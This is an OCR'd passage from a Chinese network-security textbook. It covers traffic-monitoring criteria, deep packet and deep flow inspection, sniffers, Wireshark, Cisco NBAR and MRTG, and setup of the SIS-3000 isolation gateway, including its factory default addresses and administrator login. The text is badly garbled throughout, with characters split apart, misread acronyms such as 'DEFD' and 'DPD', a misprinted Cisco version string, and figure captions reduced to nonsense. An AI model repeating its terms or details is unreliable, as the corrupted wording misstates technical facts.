的 数据 包 进行 分 析 , 无 法 满足 大 流量 、 长 期 的 抓 包 和 趋势 分 析 的 要 求 。 常见 的 产品 有 NAI 
公司 的 Sniffer Pro， 以 及 免费 的 Tcpdump、Ethereal 等 。 

3. 流量 监控 系统 的 评价 标准 

(1) 有 效 性 

能 够 全 面 准确 地 监控 所 有 流量 数据 ， 是 流量 监控 系统 设计 的 首要 目标 ， 这 直接 地 决 
定 了 监控 系统 的 价值 。 监 控 系统 必须 能 保证 所 有 的 数据 流量 都 能 被 监测 到 ， 必 要 时 可 以 
迅速 准确 地 送 往 后 处 理 器 。 

(2) 可 靠 性 

可 靠 性 指 的 是 流量 监控 系统 能 和 否 长 时 间 稳 定 的 工作 。 在 网 络 中 ， 不 仅 存在 着 大 量 的 
各 式 各 样 的 通信 数据 ， 而 且 随 时 会 有 各 种 缺损 、 被 人 为 算 改 的 数据 包 ， 突 发 的 流量 以 及 
病毒 、 非 法 入 侵 等 ， 这 就 在 客观 上 要 求 网 关 在 处 理 各 种 数据 的 时 候 ， 保 证 可 以 长 期 的 稳 
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定 正常 工作 ， 而 不 会 因为 各 种 突 发 事件 失控 ， 导 致 丢失 数据 。 

(3) 实时 性 

由 于 流量 监控 系统 一 般 直 接 部 署 在 网 络 出 口上 ， 控 制 着 用 户 所 有 的 数据 流量 ， 因 此 
要 求 控制 系统 应 该 在 尽量 不 影响 用 户 正常 的 网 络 应 用 的 情况 下 , 进行 流量 的 监视 和 过 滤 ， 
而 且 要 求 系统 能 实时 地 对 数据 做 出 解析 ， 判 断 是 否 要 拦截 和 上 报 。 
6.2.1.2 ”协议 分 析 

网 络 流量 监控 分 析 的 基础 是 协议 行为 解析 技术 ， 主 要 包含 协议 描述 和 协议 行为 解析 
两 个 环节 。 协 议 描述 环节 是 为 应 用 层 协 议 建立 协议 描述 库 的 过 程 。 协 议 描 述 库 中 包含 了 
各 个 应 用 层 协议 的 正则 表达 式 描述 和 状态 划分 信息 ， 根 据 目 标 协议 的 状态 划分 ， 能 够 使 
用 这 些 正则 表达 式 从 目标 应 用 层 协 议 的 通信 数据 中 提取 相关 的 协议 信息 ， 进 行 协议 行为 
分 析 ， 它 是 协议 行为 解析 能 够 正常 进行 的 基础 ， 它 的 建立 依赖 于 对 各 个 应 用 层 协 议 标准 
的 掌握 和 协议 行为 审计 系统 需要 对 目标 协议 进行 分 析 的 深度 。 协 议 行为 解析 环节 是 利用 
协议 描述 库 进 行 协议 行为 解析 的 流程 ， 包 括 协议 识别 、 正 则 表达 式 选 取 、 加 载 到 匹配 引 
擎 运行 、 协 议 信 息 处 理 、 输 出 结果 信息 等 几 个 关键 的 过 程 。 目 前 的 主要 方法 有 常用 端 
识别 、 深 度 包 检 测 (Deep Packet Inspection，DPI)、 深 度 流 检测 (Deep Flow Inspection, 
DEFD 以 及 这 几 种 方法 的 混合 。 常 用 端口 识别 技术 是 根据 协议 通信 五 元 组 中 的 端口 号 来 识 
别 应 用 的 , 如 常用 的 HTTP 协 议 一 般 采 用 80 端口 ,以 协议 所 用 的 端口 号 为 80 来 识别 HTTP 
协议 。 当 前 ， 由 于 采用 自 定义 端口 、 随 机 端口 甚至 加 密 隧道 等 应 用 日 益 增多 ， 采 用 常用 
端口 识别 已 经 很 难 满足 需要 。 深度 流 检 测 是 根据 各 类 应 用 的 连接 数 、 单 个 卫 地 址 的 连接 
模式 、 上 下 行 流量 的 比例 关系 、 数 据 包 发 生 频 率 等 数据 流 的 行为 特征 ， 来 对 流量 的 应 用 
类 型 进行 区 分 的 技术 ， 可 以 较 好 地 识别 出 应 用 的 类 型 (如 是 否 P2P 应 用 等 )。 而 DPI 技 
术 是 一 种 基于 特征 字 的 识别 技术 , 可 根据 不 同 协 议 的 特征 (包括 协议 所 使 用 的 端口 、 协 议 
报 文 负荷 (payload) 中 的 特定 字符 串 或 特定 的 二 进 制 数据 等 ) 来 检测 和 识别 出 具体 的 应 用 
协议 。 

1. 深度 流 检测 技术 (DFD 

流 是 一 定时 间 内 具有 相同 的 目的 地 址 、 源 地 址 、 目 的 端口 地 址 、 源 端口 地 址 和 传输 
协议 报 文 的 集合 。 深 度 流 检测 (DPD 就 是 以 流 为 基本 研究 对 象 ， 从 庞大 网 络 流 数据 中 提取 
流 的 特征 ， 如 流 大 小 、 流 速率 等 ， 从 而 判断 一 个 流 是 否 正常 的 技术 。 

各 类 网 络 安全 问题 中 ， 数 据 流 可 能 产生 一 系列 异常 ， 如 heavy-hitters (持续 大 流量 ， 
当下 载 恶意 软件 时 )，heavy-changers〈 瞬 时 流量 变化 ， 当 发 送 一 个 大 的 敏感 文件 时 )， 高 
速 流 〈 当 频繁 交互 时 )，super spread 流 〈 广 播 流 ， 当 攻击 其 他 主机 时 ) 以 及 较 小 流 〈 当 
发 送 控制 命令 时 )， 此 时 ， 使 用 深度 流 检测 技术 就 能 从 中 发 现 异 常 。 深 度 流 检 测 技术 由 于 
不 用 对 应 用 层 数据 进行 深 控 ， 只 需要 提取 流 特征 以 后 做 统计 ， 故 具有 良好 的 性 能 ， 并 且 
可 以 查 出 一 些 加 密 的 异常 ， 因 此 ， 可 作为 防御 的 第 一 步 ， 先 检测 出 异常 的 数据 流 ， 然 后 
对 异常 数据 流 做 进一步 的 深度 挖掘 ， 从 而 找到 各 种 攻击 威胁 的 源头 。 
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深度 流 检 测 技术 主要 分 为 三 部 分 : 流 特征 选择 、 流 特征 提取 、 分 类 器 。 其 中 常见 的 
流 特征 有 : 

。 流 中 数据 包 的 总 个 数 ; 

。 流 中 数据 包 的 总 大 小 ; 

。 流 的 持续 时 间 ; 

在 一 定 的 流 深度 ， 流 中 包 的 最 小 、 最 大 长 度 及 均 方差 ; 

。 在 一 定 的 流 深度 ， 流 中 最 小 、 最 大 时 间 及 均 方差 ; 

。 在 一 定 的 流 深度 ， 某 方向 上 的 数据 包 总 和 。 

常见 的 特征 选择 算法 有 BIF (Best Individual Feature, BIF) 算法 、MIFS (Mutual 
Information Feature Selection, MIFS) 算法 、MIFS-U (Mutual Information Feature 
Selection-Uncertainty, MIFS-U) 算法 、FCBF (Fast Correlation-based Filter, FCBF) 算 
法 等 ， 用 于 选择 影响 因子 最 大 的 流 特征 ， 便 于 之 后 的 攻击 流量 识别 。 

分 类 器 先 以 样本 集训 练 出 分 类 模型 ， 然 后 对 待 识别 的 数据 流 统 计 特 征 进行 分 析 ， 识 
别 出 与 APT 攻击 有 关 的 恶意 流量 。 分 类 器 中 常见 的 分 类 方法 有 贝 叶 斯 、SVM ( Support 
Vector Machine，SVM)、 神 经 网 络 、 决 策 树 等 。 

在 深度 流 检测 中 ， 首 先 对 会 话 流 进行 识别 ， 提 取 其 流 特征 ， 然 后 经 由 分 类 器 进行 分 
析 ， 如 果 判 断 为 异常 ， 则 可 采取 相应 的 处 理 行为 ; 如 果 判 断 为 可 疑 流量 ， 则 可 结合 其 他 
方法 如 上 下 行 流量 对 称 法 、 时 间 跨 度 均衡 法 、 行 为 链 关 联 法 进行 延迟 监控 判别 。 

2. 深度 包 检测 技术 DPD 

深度 包 检 测 (DPD 指 的 是 通过 相关 技术 检测 数据 包 的 有 用 载荷 , 而 不 是 简单 的 检测 数 
据 包 的 头 部 。 所 谓 “ 深 度 ” 是 和 普通 报 文 检测 的 分 析 层 次 相 比 较 而 言 的 ,“ 普 通报 文 检测 ” 
仅 分 析 数 据 包 的 4 层 以 下 的 内 容 ， 如 传统 的 “五 元 组 ” 包括 协议 类 型 、 源 地 址 、 目 的 地 
址 、 源 端口 和 目的 端口 等 ， 而 深度 包 检测 除了 对 前 面 所 述 的 内 容 进 行 解析 外 ， 还 增添 了 
对 应 用 层 载荷 的 分 析 和 识别 。 
目前 ， 深 度 包 检测 技术 可 以 用 多 种 分 析 方 法 来 识别 和 分 类 数据 流量 ， 这 些 方法 包括 
端口 识别 法 、 字 符 串 匹配 法 、 数 值 属 性 法 、 行 为 和 启发 式 方法 等 。 我 们 主要 利用 字符 串 
匹配 法 和 行为 和 启发 式 方法 实现 上 述 功能 。 

字符 串 匹 配 的 任务 就 是 把 当前 数据 包 中 应 用 层 载荷 的 特定 内 容 与 协议 标准 定义 的 
期 望 值 进行 比较 ， 检 查 其 是 否 符合 协议 标准 的 规定 ， 从 而 确定 应 用 层 协 议 的 种 类 ， 以 及 
检测 相关 敏感 关键 字 。 行 为 识别 是 针对 某 种 协议 的 行为 和 动作 的 分 析 ， 行 为 识别 技术 通 
常用 于 无 法 根据 协议 判断 的 业务 的 识别 。 启 发 式 识别 通常 可 以 归结 为 对 数据 包 业 务 的 检 
查 以 及 业务 统计 参数 的 提取 。 一 般 情况 下 ， 行 为 和 启发 式 识别 结合 在 一 起 使 用 ， 提 供 更 
完善 的 评估 能 力 。 
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6.2.1.3 ”网 络 协议 分 析 工 具 

1. Sniffer 

Sniffer， 也 可 以 称 为 嗅 探 器 ， 它 是 一 种 基于 “被 动 侦 听 ”原理 的 网 络 分 析 方 式 ， 能 
够 快速 定位 网 络 故 障 , 并 能 捕获 网 络 故障 数据 包 , 帮助 网 管 人 员 分 析 和 处 理 故障 数据 包 ， 
有 效 提 高 网 络 管理 水 平 。 对 于 Windows 操作 系统 ， 只 要 安装 了 Sniffer， 就 相当 于 把 一 台 
计算 机 变 成 一 台 嗅 探 器 ， 它 可 以 侦 听 到 任何 到 达 网 卡 的 数据 帧 。 运 用 这 种 技术 方式 ， 可 
依 数据 流动 情况 ， 监 视 网 络 的 状态 以 及 网 络 上 传输 的 信息 。ISS (Industry Standard 
Specification, ISS) 为 Sniffer 有 过 这 样 的 定义 : Sniffer 是 利用 计算 机 的 网 络 接口 截获 目 
的 地 址 为 其 他 计算 机 的 数据 报 文 的 一 种 工具 。 

网 络 嗅 探 器 一 般 由 4 部 分 组 成 : @ 网 络 硬件 设备 。@) 实时 分 析 程 序 。 该 数据 帧 中 
所 包含 的 数据 ， 是 为 了 发 现 网 络 性 能 问题 及 故障 ， 不 同 于 入 侵 检 测 系统 之 处 在 于 它 侧 重 
于 网 络 的 性 能 和 故障 方面 , 而 非 侧重 发 现 黑客 行为 。@) 监听 驱动 程序 。 首先 截获 数据 流 ， 
然后 进行 过 滤 并 将 数据 存 入 缓冲 区 。@ 解码 程序 。 把 接收 到 的 加 密 数据 进行 解密 ， 同 时 
构造 自己 加 密 数 据 包 并 发 送 到 网 络 中 。 

当前 的 局 域 网 大 多 数 都 为 以 太 网 的 结构 。 以 太 网 的 数据 都 是 以 帧 (Erame) 作 为 单位 来 
进行 传输 的 ， 因 为 帧 在 物理 上 广播 ， 所 以 同一 个 物理 网 段 上 的 所 有 的 主机 的 网 卡 都 可 接 
收 这 些 以 太 网 帧 。 网 卡 有 4 种 工作 模式 : 广播 模式 、 多 播 模 式 、 直 接 模式 和 混杂 模式 
(Promiscuous Mode)， 网 卡 缺 省 工作 模式 为 广播 模式 和 直接 模式 。 网 卡 收 到 传输 来 的 数 
据 帧 ， 网 卡 内 的 单 片 程序 先 判断 目的 MAC (Media Access Control, MAC) 地 址 ， 根 据 
工作 模式 判断 是 否 接收 ， 并 在 接收 后 产生 中 断 信号 并 通知 CPU， 否 则 就 丢弃 不 管 。 

Sniffer 工具 软件 却 可 以 把 网 卡 设置 成 为 混杂 模式 ， 在 这 工作 模式 中 ， 网 卡 不 会 对 目 
的 地 址 进行 判断 , 而 会 直接 对 收 到 的 每 个 数据 帧 产生 硬件 的 中 断 提醒 操作 系统 进行 处 理 ， 
这 样 ， 我 们 就 可 以 通过 软件 编程 实现 相应 的 捕获 以 及 分 析 ， 进 一 步 掌握 数据 报 文 的 每 字 
段 的 含义 ， 从 而 实现 对 网 络 的 数据 报 文 的 监听 及 分 析 。 由 此 看 出 ，Sniffer 的 工作 在 网 络 
环境 最 底层 ， 拦 截 在 网 络 上 进行 传送 的 所 有 的 数据 ， 并 且 通 过 相应 的 软件 进行 处 理 ， 实 
时 的 分 析 数 据 内 容 ， 进 一 步 的 分 析 所 处 网 络 的 状态 以 及 整体 的 布局 。 实 际 的 应 用 中 ， 
Sniffer 分 软 与 硬件 两 种 。Sniffer 软件 的 优点 是 容易 学 习 、 使 用 ， 相 对 比较 便宜 ， 但 是 其 
缺点 则 是 不 能 抓 取 到 网 络 中 的 所 有 传输 数据 ， 在 某 些 特定 的 情况 下 有 可 能 不 能 真正 了 解 
网 络 的 故障 以 及 运行 的 情况 ; 而 硬件 Sniffer 则 被 称 之 为 协议 分 析 仪 ， 可 以 获取 到 网 络 上 
所 有 的 数据 ， 并 且 对 网 络 的 状况 的 分 析 也 较为 准确 。Sniffer 一 般 具 有 的 功能 模块 及 其 作 
用 如 图 6-6 所 示 。 

Sniffer 具有 如 下 特点 : 

© 高 性 能 的 网 络 流量 捕获 能 力 ， 能 够 记录 网 络 链 路 上 的 网 络 流量 信息 ; 

© 流量 的 高 级 统计 分 析 能 力 ， 能 以 协议 、 数 据 包 大 小 等 来 统计 流量 分 布 ; 
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传递 过 滤 条 件 


传递 捕获 数据 


协议 解析 模块 


传递 解析 数据 


读 取 数据 显示 


保存 数据 


| amerma H mean | 。。 | 。 数据 显示 模块 


图 6-6 Sniffer 功能 模块 及 其 作用 


@ 强大 的 协议 解码 能 力 和 专家 分 析 能 力 ， 能 够 解析 各 种 数据 包 ; 

@ Sniffer 通常 运行 在 路 由 器 或 有 路 由 功能 的 主机 上 ， 以 方便 截获 数据 ; 

© Sniffer 既 可 以 是 硬件 ,也 可 以 是 软件 , 实现 了 Sniffer 技术 的 硬件 或 软件 就 成 为 
一 个 Sniffer( 即 网 络 嗅 探 器 )。 

2. Wireshark 

Wireshark (前 称 Ethereal) 是 一 款 免费 开源 的 协议 解析 器 , 是 目前 世界 范围 内 应 用 最 
广泛 的 网 络 协议 解析 软件 之 一 。 在 GNUGPL 通用 许可 证 的 保障 范围 内 ， 使 用 者 可 以 免 
费 取得 该 软件 及 其 源 代码 ， 并 可 以 根据 自身 的 需要 对 Wireshark 进行 定制 或 扩展 。 它 使 
用 WinPCAP 作为 接口 ， 直 接 与 网 卡 进行 数据 报 文 交换 。 

Wireshark 工作 界面 是 可 视 化 的 图 形 界面 ， 分 为 上 、 中 、 下 三 部 分 : 上 部 分 列 出 所 有 
捕获 到 的 数据 包 ， 可 以 看 到 各 个 数据 包 较 详尽 的 总 结 性 信息 ; 中 间 部 分 为 数据 包 协 议 信 
息 ， 用 来 显示 某 个 指定 数据 包 经 过 网 络 各 层 使 用 的 协议 信息 ;工作 界面 下 部 分 是 显示 指 
定数 据 包 的 内 容 ， 该 内 容 以 十 六 进 制 形式 显示 ， 也 就 是 数据 在 物理 层 上 传送 时 的 最 后 
形式 。 

WireShark 能 够 在 网 卡 接口 处 捕捉 数据 包 、 并 实时 显示 包 的 详细 协议 信息 ; 能 够 打 
开 / 保 存 捕捉 的 包 、 导 入 导出 其 他 捕捉 程序 支持 的 包 数 据 格式 ; 能 够 在 网 卡 处 有 选择 性 捕 
捉 数据 包 、 在 捕捉 到 的 包 中 也 可 以 有 选择 性 的 显示 不 同 条 件 的 数据 包 ; 还 可 以 显示 多 种 


Bo 
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统计 分 析 结 果 ( 比 如 TCP. UDP 流 、 各 个 协议 层 统计 信息 等 )， 同 时 扩展 了 大 量 的 
Ethereal(Wireshark 前 身 ) 所 不 支持 的 协议 , 支持 在 UNIX 和 Windows 平台 下 进行 开发 。 
其 系统 结构 如 图 6-7 所 示 。 


GTK 1/2 


Win-/libpcap 
Capture -Filters 


图 6-7 Wireshark 系统 结构 图 


Wireshark 系统 结构 的 6 个 功能 模块 如 下 : 

© GTK 1/2: 图 形 窗口 编程 工具 。 

@ Core: 将 其 他 模块 连接 起 来 ， 起 到 综合 调度 的 作用 。 

@ Epan: Wireshark 对 协议 的 具体 解析 ， 其 中 协议 解析 器 的 开发 包括 内 置 (built-in) 
和 插件 (在 plugin) 的 方式 。 

Win-/libpcap: 底层 抓 包工 具 ， 提 供 了 一 整套 的 抓 包 函 数 库 。 

© Capture: 抓 包 引擎 。 

© Wiretap: 向 磁盘 读 写 包 文 件 ， 包 括 libpcap 和 其 他 格式 的 包 文 件 。 

Wireshark 的 结构 主要 由 Capture Core, win-/libpcap, WireTap, Dissector 几 个 核心 
模块 构成 。 综 合 调度 模块 Capture Core 调用 底层 抓 包 工具 win-/libpcap 获得 网 络 数据 ， 
调用 磁盘 读 写 包 模块 WireTap 写 入 本 地 磁盘 。 因 为 数据 是 二 进 制 文件 ， 所 以 必须 调用 解 
析 器 模块 Dissector 对 二 进 制 数据 进行 协议 解读 , 并 把 协议 部 分 的 各 个 字段 信息 进行 详细 
地 呈现 。 解 析 器 Dissector 的 核心 工作 就 在 于 数据 包 详细 内 容 窗口 部 分 的 树 形 结构 的 维 
护 ， 并 结合 过 滤器 、 数 据 包 列 表 等 部 分 ， 进 行 筛选 与 信息 的 呈现 。 当 用 户 需 要 对 新 协议 
进行 开发 ， 实 质 上 就 是 对 Dissector 进行 拓展 ，Dissector 可 以 是 内 置 形式 的 (Build-in)， 也 
可 以 是 插件 形式 的 Plug-in)， 所 以 ， 基 于 Wireshark 的 协议 解析 器 开发 有 两 种 模式 ， 即 : 
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Build-in, Plug-in. 

3. NBAR 

基于 网 络 的 应 用 识别 (Network-Based Application Recognition, NBAR), #£7£ Cisco 
ISO 12.0(5)XE2 中 引入 的 一 个 功能 。 它 查看 数据 包 的 前 512 字 节 ， 因 此 ，NBAR 可 以 检 
测 识别 各 种 应 用 协议 ， 包 括 使 用 静态 端口 的 、 非 TCP/UDP 的 IP 层 协议 、 使 用 动态 端 
的 、 伪 装 其 他 端口 的 〈 采 用 深度 报 文 检查 ， 检 查 某 些 位 置 的 字段 ， 不 是 全 部 载荷 都 检查 ， 
又 称 为 Application Inspection)。NBAR 还 支持 用 户 定义 的 应 用 ， 比 如 使 用 某 个 端口 等 。 
这 样 也 可 以 识别 这 些 应 用 并 对 其 分 类 。 

NBAR 可 以 通过 分 析 OSI 参考 模型 第 3 层 到 第 7 层 的 信息 对 流量 进行 分 类 ， 设 置 
NBAR 第 一 步 就 是 建立 审查 的 流量 分 类 。NBAR 检查 可 以 帮助 我 们 做 很 多 事情 ， 如 应 用 
类 型 、 连 接 的 具体 地 址 、 连 接 中 的 数据 和 数据 包 的 长 度 。 基 于 匹配 标准 ，NBAR 将 匹配 
的 流量 放 进 特定 的 类 (或 组 ) 中 。 在 建立 了 分 类 规则 之 后 ， 建 立 用 来 标识 流量 策略 ， 对 于 
IP 流量 , 我 们 使 用 IP 优先 级 来 对 流量 进行 分 组 (类 )。 IP 优先 级 标准 使 用 他 包头 中 的 ToS 
(Type of Service, ToS) 域 中 的 位 来 分 类 流量 。 当 流量 进入 路 由 器 时 就 执行 这 两 步 ， 然 后 
当 流量 离开 路 由 器 上 的 一 个 特定 的 外 出 接口 时 ， 定 义 对 被 标记 的 流量 将 采取 什么 操作 。 
我 们 在 流量 优先 级 控制 上 通常 使 用 QoS (Quality of Service，QoS)， 这 将 使 得 数据 包 被 
发 送 接口 之 前 ， 首 先 需 要 排 成 队列 。 而 NBAR 可 以 为 这 些 流 量 定义 其 他 策略 ， 限 制 其 带 
宽 ， 甚 至 丢弃 这 些 流量 。 

NBAR 包含 了 一 种 叫 发 现 特征 的 协议 (Protocol Discovery Feature)， 用 它 可 以 轻易 发 
现 那些 传输 过 程 中 的 应 用 协议 ， 可 以 在 端口 上 做 进出 流量 和 流速 统计 。 要 实现 对 某 种 流 
量 的 控制 , 就 要 在 Cisco 的 路 由 器 上 实现 对 PDLM (Packet Description Language Module, 
PDLM) 的 支持 。PDLM 即 数据 包 描述 语言 模块 ， 它 是 一 种 对 网 络 高 层 应 用 的 协议 层 的 
描述 ,例如 协议 类 型 、 服 务 端口 号 等 ， 它 可 以 让 NBAR 适应 很 多 已 有 的 网 络 应 用 ， 同 时 
还 可 以 通过 定义 ， 使 NBAR 支持 许多 新 兴 的 网 络 应 用 ， 并 且 利 用 PDLM 可 以 限制 一 些 
网 络 上 的 恶意 流量 。 

4. MRTG 

NBAR 用 户 定义 的 定制 应 用 程序 分 类 ， 使 用 户 可 以 指定 自己 的 匹配 条 件 来 识别 端 
范围 以 及 特定 端口 上 基于 TCP 或 UDP 的 应 用 程序 。 在 网 络 管理 维护 的 过 程 中 ， 为 了 全 
面 衡 量 网 络 运行 状况 ， 就 需要 对 网 络 状态 做 更 细致 、 更 精确 的 测量 。 而 多 路 由 器 流量 图 
示 器 MRTG (Multi Router Traffic Grapher, MRTG) 就 是 一 个 基于 SNMP(Simple Network 
Management Protocol，SNMP) 的 监控 网 络 链 路 流量 负载 的 工具 软件 ， 利 用 它 可 以 从 所 有 
运行 SNMP 协议 的 设备 上 (如 服务 器 、 路 由 器 、 交 换 机 等 ) 抓 取 到 信息 ， 以 非常 直观 的 方 
式 显 示 给 用 户 ， 而 且 它 所 耗 用 的 系统 资源 较 小 ， 这 对 于 网 络 管理 员 来 说 是 非常 重要 的 。 

简单 网 络 管理 协议 [SNMP) 是 基于 TCP/IP 的 互联 网 管理 协议 , 它 是 由 SGMP(Simple 
Gateway Monitoring Protocol) 协议 发 展 而 来 的 。SNMP 是 一 个 应 用 层 的 协议 ， 用 来 在 
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SNMP 服务 器 和 SNMP 代理 之 间 提 供 一 种 格式 化 的 信息 通讯 。 SNMP 的 结构 由 三 部 分 组 
W: SNMP 服务 器 ，SNMP 代理 和 MIB (Management Information Base, MIB). SNMP 
服务 器 是 用 SNMP 来 控制 和 监控 网 络 设备 的 系统 , 通用 的 网 络 管理 系统 叫做 网 络 管理 系 
统 (NMS)。SNMP 代理 是 一 个 软件 系统 ， 用 来 维持 网 络 设备 的 数据 并 在 需要 时 向 管理 系 
统 报告 这 些 数据 ， 它 和 MIB 同 在 被 管理 的 设备 上 。MIB 是 一 个 网 络 管理 信息 的 虚拟 的 
信息 存储 区 ， 由 被 管理 的 对 象 的 集合 组 成 。SNMP 服务 器 可 以 向 SNMP 代理 发 出 请 求 来 
得 到 并 可 以 改变 MIB 的 值 ，SNMP 代理 可 以 响应 这 种 请 求 ， 但 是 SNMP 也 可 以 不 依赖 
于 这 样 的 请 求 而 直接 主动 的 向 SNMP 服务 器 发 出 通告 ， 告 诉 服务 器 网 络 中 的 状态 情况 。 

MRTG 是 一 个 基于 SNMP 协议 的 监控 网 络 流量 和 主机 资源 的 开放 源 代码 的 管理 工 
具 。 它 通过 SNMP 请 求 得 到 被 监控 对 象 的 流量 信息 ， 将 这 些 流量 信息 以 PNG 格式 的 图 
形 表 示 ， 并 将 包含 这 些 图 形 的 HTML 文档 通过 Web 方式 显示 给 用 户 ， 非 常 直观 地 显示 
流量 负载 。MRTG 是 用 Perl 语言 编写 的 ， 可 以 工作 在 Unix/Linux 和 Windows NT/2003 
等 环境 下 。MRTG 的 Perl 脚本 用 SNMP 来 读 取 路 由 器 的 流量 信息 , 创建 代表 被 监控 网 络 
连接 的 图 形 ， 这 些 图 嵌入 在 Web 页 面 中 。 

MRTG 主要 由 4 个 模块 组 成 。 基础 模块 : 包括 定义 管理 信息 结构 SMI 要 求 的 数据 结 
构 ， 提 供 相应 的 方法 并 通过 SNMP 操作 获取 被 管 对 象 信息 的 SNMP 模块 和 MRTG 支持 
模块 ; 日 志文 件 : MRTG 使 用 的 日 志文 件 以 ASCII 文本 形式 来 记录 测 得 的 流量 数据 ， 由 
Rate Up 模块 进行 更 新 ， 日 志 更 新 和 绘图 工具 : 在 该 模块 中 ，MRTG 使 用 Perl 语言 程序 
来 完成 日 志文 件 的 更 新 和 统计 图 形 的 生成 ; 配置 和 网 页 组 织 工具 : MRTG 提供 了 相关 的 
配置 文件 生成 工具 cfgmaker 和 网 页 组 织 工 具 indexmaker。cfgmaker 利用 SNMP 协议 读 取 
被 管 设 备 中 的 对 象 信息 ， 自 动 生成 该 设备 的 框架 配置 文件 ，Indexmaker 通过 读 取 配 置 文 
件 中 的 Target 描述 获得 对 象 信息 ， 并 用 这 些 信 息 组 织 成 该 对 象 的 HIML 页 。 


6.2.2 ”网 御 SIS-3000 安全 隔离 与 信息 交换 系统 ( 网 间 ，NetGap ) 


6.2.2.1 简介 

网 御 SIS-3000 系列 是 网 御 星云 〈 原 联想 网 御 ) 依靠 多 年 信息 安全 产品 研发 的 积累 ， 
严格 遵照 国家 有 关 主 管 部 门 的 设计 规范 要 求 ， 生 产 出 的 具有 完全 自主 知识 产权 的 安全 隔 
离 与 信息 交换 系统 。 它 采用 多 主机 隔离 结构 ， 在 业内 首次 提出 并 实现 专 有 SIS 安全 隔离 
技术 ， 把 安全 性 (Security)、 智 能 性 (mtelligence)、 高 效 性 (Speed) 完 美 地 结合 在 一 起 。 该 系 
统 安 装 应 用 方便 ， 通 过 对 连接 和 数据 包 的 获取 、 阻 断 、 分 离 、 检 测 、 重 组 、 交 换 、 恢 复 、 
连接 等 一 系列 安全 操作 完成 数据 的 隔离 与 交换 ， 而 这 些 复杂 的 安全 检测 操作 对 用 户 而 言 
是 透明 的 ， 最 大 限度 地 保证 了 用 户 应 用 的 方便 性 。 同 时 ， 该 系统 根据 不 同 应 用 ， 量 身 定 
制 多 个 功能 模块 ， 满 足 用 户 的 不 同 应 用 需求 ， 主 要 包括 : 文件 交换 模块 、 数 据 库 传输 模 
块 、 邮 件 传 输 模 块 、 安 全 浏览 模块 、FTP 访问 模块 、TCP/UDP 访问 模块 、 安 全 通道 模块 、 
统一 用 户 认 证 模块 等 。 其 工作 原理 如 图 6-8 所 示 。 


ROR 网 络 安全 技术 与 产品 


Un-trusted Area Trusted Area 


图 6-8 SIS-3000 安全 隔离 与 信息 交换 系统 工作 原理 


6.2.2.2 ”基本 配置 

1. 登录 

以 Web 界面 管理 方式 为 例 ， 其 步骤 如 下 : 在 管理 主机 打开 TE 浏览 器 ， 并 在 地 址 栏 
输入 “https: /10.0.0.1: 8889”{ 出 厂 默认 IP 为 10.0.0.1( 内 网 侧 )10.0.0.2( 外 网 侧 )}， 出 现 
选择 证 书 提 示 后 单 击 “ 确 定 ”按钮 ， 然 后 会 出 现 安全 警报 后 ， 单 击 “ 是 〈Y)” 就 会 出 现 
安全 隔离 网 闸 登录 页 面 ， 默 认 情况 下 ,用 户 名 和 密码 均 为 : administrator， 如 图 6-9 所 示 。 


一 + 欢迎 使 用 联想 网 着 安 全 篇 离 与 信息 交换 系统 


[administrator 


图 6-9 网 御 SIS 安全 隔离 与 信息 交换 系统 登录 界面 


You 
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2. 网 络 配置 

(1) 配置 网 络 设备 

网 御 SIS-3000 安全 隔离 网 闸 可 配置 的 网 络 设备 包括 : 物理 设备 、 别 名 设备 和 元 余 
设备 ， 见 图 6-10。 物 理 设 备 配 置 : 物理 设备 初始 情况 下 工作 在 路 由 模式 ， 也 就 是 说 该 设 
备 上 绑 定 有 IP 地 址 , 可 以 与 其 他 设备 进行 数据 包 的 路 由 转发 。 其 中 第 二 个 物理 设备 fe2 
是 默认 的 可 管理 设备 。 它 的 默认 IP 地 址 是 10.0.0.1， 子 网 掩 码 为 255.255.255.0， 这 个 地 
址 允许 管理 ，PING 和 TRACEROUTE (默认 管理 主机 的 IP 地 址 是 10.0.0.200)， 如 图 


6-11 所 示 。 
2 Ñ xine 网 络 配置 > 网 络 设备 
日 reaees SERD | Grave) 
eee 设备 名 称 eB RSet MEAR ”是 否 启 用 探 人 
PE fel f WHO PSRE x 区 
a a fe2 10.0.0. 1/255. 255. 255.0 管理 接口 PORE ba w 
plc Reso esse [7] 7 
Q 资源 定义 MD 4D >D >D gm7 eal |a [Go] 每 页 |20 | 行内 


图 6-10 ”物理 设备 列表 


F https://10. 0.0. 1:8889 - 物理 设备 维护 


- Wicr... 


名 称 

mac 地 址 

链 路 工作 模式 
链 路 速度 

MTU: 

工作 模式 

TIF 地 址 获 职 


开局 IPWAC 地 址 绑 定 
区 许 未 乡 定 的 IPAC 地 址 

通过 

开局 IF 地 址 欺骗 检查 

用 于 管理 

允许 PING 

允许 Traceroute 


fe3 


[00:90:FB: 14:74:48 


自 适应 。 


100 ~ 


1500 


路 由 模式 


静态 指定 


TIP 地 址 [192.168.0.1 


1€ 码 (255.255. 255.0 


6-11 物理 设备 可 配置 的 属性 
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别名 设备 配置 : 别名 设备 的 作用 是 给 物理 设备 配置 多 个 P 地 址 。 每 个 物理 设备 可 
以 关联 的 别名 设备 是 253 个 ,这 些 IP 具有 “用 于 管理 ”“ 人 允许 PING”,“ 人 允许 Traceroute” 
等 属性 ， 见 图 6-12， 图 6-13 。 同 时 要 注意 的 是 别名 设备 的 IP 地 址 不 能 重复 ， 并 且 别 名 
设备 的 总 数 不 能 超过 1024 个 。 


e Ñ ammes 网 络 配置 >> 网 络 设备 

日 基 网 站 配置 Grae) CE Cr 
大 网 络 设备 
Ø 域名 服务 器 设备 名 称 eS Hee Be ”是否 局 用 Rte 
@ Poa fe2 0 192. 168. 1. 110/255. 255. 255.0 fe2 0 a 区 命 

由 ği 高 可 靠 性 设置 £e3_0 192. 168. 0. 2/255. 255. 255. 0 fe3 0 y wr 命 

@ E 

田 阅 资源 定义 

e N 文 件 交换 MD 4D D >D Snn ates [| 页 [Go] 每 页 [20 v| GE 


图 6-12 别名 设备 列表 


F https://10.0.0.1:8889 - 别名 设备 维护 - Microsoft Inter... f) 


* 选择 乡 定 设备 : fed 
# 选择 别名 ID: [0 


* 掩 码 : |255. 255. 255.0 


允许 PING: YW 


允许 Traceroute 


图 6-13 别名 设备 可 配置 的 属性 


宛 余 设 备 : 通过 将 几 个 物理 设备 捆绑 在 一 起 组 成 一 个 虚拟 的 元 余 设 备 。 宛 余 设 备 主 
要 用 于 接口 元 余 ， 以 提高 链 路 可 靠 性 和 增加 安全 隔离 网 闸 带 宽 。 宛 余 设 备 的 高 级 设置 可 
